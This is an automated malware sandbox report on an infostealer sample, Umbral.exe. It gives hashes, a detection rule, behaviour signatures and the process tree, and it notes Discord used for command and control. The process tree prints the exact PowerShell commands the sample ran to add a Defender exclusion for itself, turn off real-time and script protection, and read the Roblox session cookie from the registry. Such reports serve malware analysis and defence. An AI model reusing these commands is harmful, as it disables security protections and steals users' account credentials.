Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-12-2024 15:02
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240903-en
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
0cc2a414bb58a3f9e345ea56350ff9a4
-
SHA1
09ec47af8c94ac3a94ad0e29df8a1405a6bc9e01
-
SHA256
2ce5ab90e160d795bee80f40ab817b2beb35fb43845e61658942eda4ca0b376c
-
SHA512
007ea98156043b18be5a612741ca9d2a0494dd5a5f7cea06a27185ac0de3950dd295d7e5066ea4313e3c517159b96450397e9645798fb2a2abd92ab8c21adccb
-
SSDEEP
6144:tloZM0rIkd8g+EtXHkv/iD4eKbNoOJBiVHaIJtM9Xb8e1mgri:voZDL+EP8eKbNoOJBiVHaIJtMZ3m
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1884-1-0x0000000000EE0000-0x0000000000F20000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2376 powershell.exe 1512 powershell.exe 1644 powershell.exe 276 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 11 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 960 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1884 Umbral.exe 2376 powershell.exe 1512 powershell.exe 1644 powershell.exe 1892 powershell.exe 276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1884 Umbral.exe Token: SeIncreaseQuotaPrivilege 2952 wmic.exe Token: SeSecurityPrivilege 2952 wmic.exe Token: SeTakeOwnershipPrivilege 2952 wmic.exe Token: SeLoadDriverPrivilege 2952 wmic.exe Token: SeSystemProfilePrivilege 2952 wmic.exe Token: SeSystemtimePrivilege 2952 wmic.exe Token: SeProfSingleProcessPrivilege 2952 wmic.exe Token: SeIncBasePriorityPrivilege 2952 wmic.exe Token: SeCreatePagefilePrivilege 2952 wmic.exe Token: SeBackupPrivilege 2952 wmic.exe Token: SeRestorePrivilege 2952 wmic.exe Token: SeShutdownPrivilege 2952 wmic.exe Token: SeDebugPrivilege 2952 wmic.exe Token: SeSystemEnvironmentPrivilege 2952 wmic.exe Token: SeRemoteShutdownPrivilege 2952 wmic.exe Token: SeUndockPrivilege 2952 wmic.exe Token: SeManageVolumePrivilege 2952 wmic.exe Token: 33 2952 wmic.exe Token: 34 2952 wmic.exe Token: 35 2952 wmic.exe Token: SeIncreaseQuotaPrivilege 2952 wmic.exe Token: SeSecurityPrivilege 2952 wmic.exe Token: SeTakeOwnershipPrivilege 2952 wmic.exe Token: SeLoadDriverPrivilege 2952 wmic.exe Token: SeSystemProfilePrivilege 2952 wmic.exe Token: SeSystemtimePrivilege 2952 wmic.exe Token: SeProfSingleProcessPrivilege 2952 wmic.exe Token: SeIncBasePriorityPrivilege 2952 wmic.exe Token: SeCreatePagefilePrivilege 2952 wmic.exe Token: SeBackupPrivilege 2952 wmic.exe Token: SeRestorePrivilege 2952 wmic.exe Token: SeShutdownPrivilege 2952 wmic.exe Token: SeDebugPrivilege 2952 wmic.exe Token: SeSystemEnvironmentPrivilege 2952 wmic.exe Token: SeRemoteShutdownPrivilege 2952 wmic.exe Token: SeUndockPrivilege 2952 wmic.exe Token: SeManageVolumePrivilege 2952 wmic.exe Token: 33 2952 wmic.exe Token: 34 2952 wmic.exe Token: 35 2952 wmic.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeIncreaseQuotaPrivilege 3008 wmic.exe Token: SeSecurityPrivilege 3008 wmic.exe Token: SeTakeOwnershipPrivilege 3008 wmic.exe Token: SeLoadDriverPrivilege 3008 wmic.exe Token: SeSystemProfilePrivilege 3008 wmic.exe Token: SeSystemtimePrivilege 3008 wmic.exe Token: SeProfSingleProcessPrivilege 3008 wmic.exe Token: SeIncBasePriorityPrivilege 3008 wmic.exe Token: SeCreatePagefilePrivilege 3008 wmic.exe Token: SeBackupPrivilege 3008 wmic.exe Token: SeRestorePrivilege 3008 wmic.exe Token: SeShutdownPrivilege 3008 wmic.exe Token: SeDebugPrivilege 3008 wmic.exe Token: SeSystemEnvironmentPrivilege 3008 wmic.exe Token: SeRemoteShutdownPrivilege 3008 wmic.exe Token: SeUndockPrivilege 3008 wmic.exe Token: SeManageVolumePrivilege 3008 wmic.exe Token: 33 3008 wmic.exe Token: 34 3008 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1884 wrote to memory of 2952 1884 Umbral.exe 31 PID 1884 wrote to memory of 2952 1884 Umbral.exe 31 PID 1884 wrote to memory of 2952 1884 Umbral.exe 31 PID 1884 wrote to memory of 2376 1884 Umbral.exe 34 PID 1884 wrote to memory of 2376 1884 Umbral.exe 34 PID 1884 wrote to memory of 2376 1884 Umbral.exe 34 PID 1884 wrote to memory of 1512 1884 Umbral.exe 36 PID 1884 wrote to memory of 1512 1884 Umbral.exe 36 PID 1884 wrote to memory of 1512 1884 Umbral.exe 36 PID 1884 wrote to memory of 1644 1884 Umbral.exe 38 PID 1884 wrote to memory of 1644 1884 Umbral.exe 38 PID 1884 wrote to memory of 1644 1884 Umbral.exe 38 PID 1884 wrote to memory of 1892 1884 Umbral.exe 40 PID 1884 wrote to memory of 1892 1884 Umbral.exe 40 PID 1884 wrote to memory of 1892 1884 Umbral.exe 40 PID 1884 wrote to memory of 3008 1884 Umbral.exe 42 PID 1884 wrote to memory of 3008 1884 Umbral.exe 42 PID 1884 wrote to memory of 3008 1884 Umbral.exe 42 PID 1884 wrote to memory of 1752 1884 Umbral.exe 44 PID 1884 wrote to memory of 1752 1884 Umbral.exe 44 PID 1884 wrote to memory of 1752 1884 Umbral.exe 44 PID 1884 wrote to memory of 2728 1884 Umbral.exe 46 PID 1884 wrote to memory of 2728 1884 Umbral.exe 46 PID 1884 wrote to memory of 2728 1884 Umbral.exe 46 PID 1884 wrote to memory of 276 1884 Umbral.exe 48 PID 1884 wrote to memory of 276 1884 Umbral.exe 48 PID 1884 wrote to memory of 276 1884 Umbral.exe 48 PID 1884 wrote to memory of 960 1884 Umbral.exe 50 PID 1884 wrote to memory of 960 1884 Umbral.exe 50 PID 1884 wrote to memory of 960 1884 Umbral.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:960
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bdc352308b30d35923aa337c5d2c9943
SHA1d59167ea202caf4b04cfe9a332d85b700df17e9a
SHA2569d420cac2dcb521bea88212eff03ade6fa063ba9b8dfe8eba004ae194773f853
SHA512a272d4802b79bdf662631022dc7bd8a889f39af372dd65dd65bd4034094a766da79af53866821c71f75a7ae9595e8a0df853a869434ce9899813c420b824f56b